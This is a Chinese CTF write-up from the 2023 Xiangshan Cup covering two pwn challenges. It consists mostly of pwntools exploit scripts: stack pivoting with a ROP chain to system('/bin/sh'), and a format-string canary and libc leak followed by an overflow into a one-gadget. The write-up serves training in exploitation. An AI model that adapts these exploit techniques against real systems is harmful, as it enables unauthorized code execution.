2023香山杯

move

一眼栈溢出，然后三次栈迁移。

exp

from tools import*
context(os='linux',arch='amd64',log_level='debug')
p,e,libc=load("./pwn")
pop_rdi=0x401353
ret=0x40101a
bss=0x4050A0
leave_ret=0x40124b
read=0x401230
pop_rbp=0x40119d
payload=p64(pop_rbp)+p64(bss)+p64(read)
p.recvuntil("lets travel again!\n")
debug(p,0x40124B,0x4012D6)
p.send(payload)
p.recvuntil("Input your setp number")
p.send('\x78\x56\x34\x12')
payload=b"a"*0x26+b'bb'+p64(bss-8)*2+p64(leave_ret)
p.send(payload)
payload=p64(0x405070-8)+p64(pop_rdi)+p64(e.got['puts'])+p64(0x40125C )+p64(0x405070-8)+p64(read)+p64(0x405070)+p64(leave_ret)
p.send(payload)
libc_base=recv_libc()-0x80970
log_addr('libc_base')
bin_sh=libc_base+0x1b3d88 
system_addr=libc_base+0x4f420
payload=p64(ret)+p64(pop_rdi)+p64(bin_sh)+p64(system_addr)+p64(0xdeadbeef)*2+p64(0x405030)+p64(leave_ret)
p.sendline(payload)
p.interactive()

pwthon

漏洞比较简单，就是格式化字符串，栈溢出，难的是第一次见这种题型，不知道怎么本地运行的，泄露canary 查找溢出偏移都是远程完成的，直到查找 libc 麻瓜了，必须本地调试

这个本地调试的方法有以下几个点

1、必须是 python3.7

2、使用 sys.path.append("/home/zikh/Desktop/app.cpython-37m-x86_64-linux-gnu.so") 去导入他给的库

3、使用 gdb 调试他给的库，在用 attach 调试进程

结合本地和远程泄露的 libc 地址发现 libc 就是我本地的环境

exp

from tools import*
context.log_level = "debug"
p=process(["python3.7","main.py"])
# p=remote('123.56.9.101',16674)
p.sendlineafter('> ','0')
p.sendline(b'%p.'*(0x20))
p.recv()
data=p.recv()
canary=data[-22:-4]
libc_base=data[-79:-65]#
log_info(canary)
log_info(libc_base)
canary=int(canary,16)
libc_base=int(libc_base,16)-0x10fcdd
log_addr('canary')
log_addr('libc_base')
p.sendline(b'a'*264+p64(canary)*2+p64(libc_base+0x4f2a5))


p.interactive()